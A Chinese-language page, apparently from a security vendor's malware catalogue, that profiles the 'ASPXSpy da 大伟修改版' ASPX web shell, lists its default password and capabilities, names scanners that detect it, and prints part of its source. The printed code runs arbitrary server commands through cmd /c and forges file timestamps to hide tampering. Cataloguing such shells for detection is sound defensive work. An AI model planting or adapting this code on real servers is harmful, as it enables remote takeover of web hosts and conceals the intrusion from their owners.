ASPXSpy da 大伟修改版

2011-12-19 16:02:57 来源:本站原创,请勿转载 浏览:495
ASPXSpy da 大伟修改版

木马名称:ASPXSpy da 大伟修改版
木马格式:aspx
默认密码:3hack
木马作用:SqlRootKit、运行cmd、克隆文件(夹)时间、系统信息查看、注册表读取、数据库连接查看、文件上传管理等功能。
运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:aspx的修改版,危险。
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 ASPXSpy da 大伟修改版 这个asp网页木马。

ASPXSpy da 大伟修改版部分代码

<%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true" %>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.OleDb" %>
<script runat="server">
Dim PASSWORD as string = "3hack"   '这里修改密码 默认密码为"3hack"

Dim url,TEMP1,TEMP2,TITLE,SORTFILED as string

Sub Login_click(sender As Object, E As EventArgs)
 if Textbox.Text=PASSWORD then    
  session("lake2")=1
  session.Timeout=45
 else
  response.Write("<div align=center><font color='red'>欢迎光临华东黑客联盟URL http://www.3hack.com!</font></div>")
 end if
End Sub

Sub RunCMD(Src As Object, E As EventArgs)
 Dim myProcess As New Process()
 Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
 myProcessStartInfo.UseShellExecute = False
 myProcessStartInfo.RedirectStandardOutput = true
 myProcess.StartInfo = myProcessStartInfo
 myProcessStartInfo.Arguments="/c " & Cmd.text
 myProcess.Start()
 Dim myStreamReader As StreamReader = myProcess.StandardOutput
 Dim myString As String = myStreamReader.Readtoend()
 myProcess.Close()
 mystring=replace(mystring,">","&lt;")
 mystring=replace(mystring,"<","&gt;")
 result.text="Command = " & Cmd.text & vbcrlf & "<ul class='td3'><pre>" & mystring & "</pre></ul>"
 Cmd.text=""
End Sub
Sub CloneTime(Src As Object, E As EventArgs)
 existdir(time1.Text)
 existdir(time2.Text)
 Dim thisfile As FileInfo =New FileInfo(time1.Text)
 Dim thatfile As FileInfo =New FileInfo(time2.Text)
 thisfile.LastWriteTime = thatfile.LastWriteTime
 thisfile.LastAccessTime = thatfile.LastAccessTime
 thisfile.CreationTime = thatfile.CreationTime
 response.Write("<div align=center><font color='red'>Clone Time 成功!</font></div>")
End Sub

(0)
(0)